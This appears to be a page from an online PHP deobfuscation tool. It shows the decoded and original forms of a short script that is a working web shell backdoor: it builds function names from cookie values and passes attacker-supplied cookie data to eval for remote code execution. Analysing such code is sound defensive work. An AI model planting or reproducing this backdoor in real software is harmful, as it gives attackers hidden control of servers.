Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

function clnt() { $b = $_COOKIE; ($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($m..

Decoded Output download

<?  function clnt() { 
	$b = $_COOKIE; 
	($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b; 
	 
	return 0; 
} 
 
clnt(); ?>

Did this file decode correctly?

Original Code

function clnt() {
	$b = $_COOKIE;
	($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b;
	
	return 0;
}

clnt();

Function Calls

clnt 1

Variables

$b 0

Stats

MD5 2cf5afdf0b978c1a7511932ca762d2bf
Eval Count 0
Decode Time 273 ms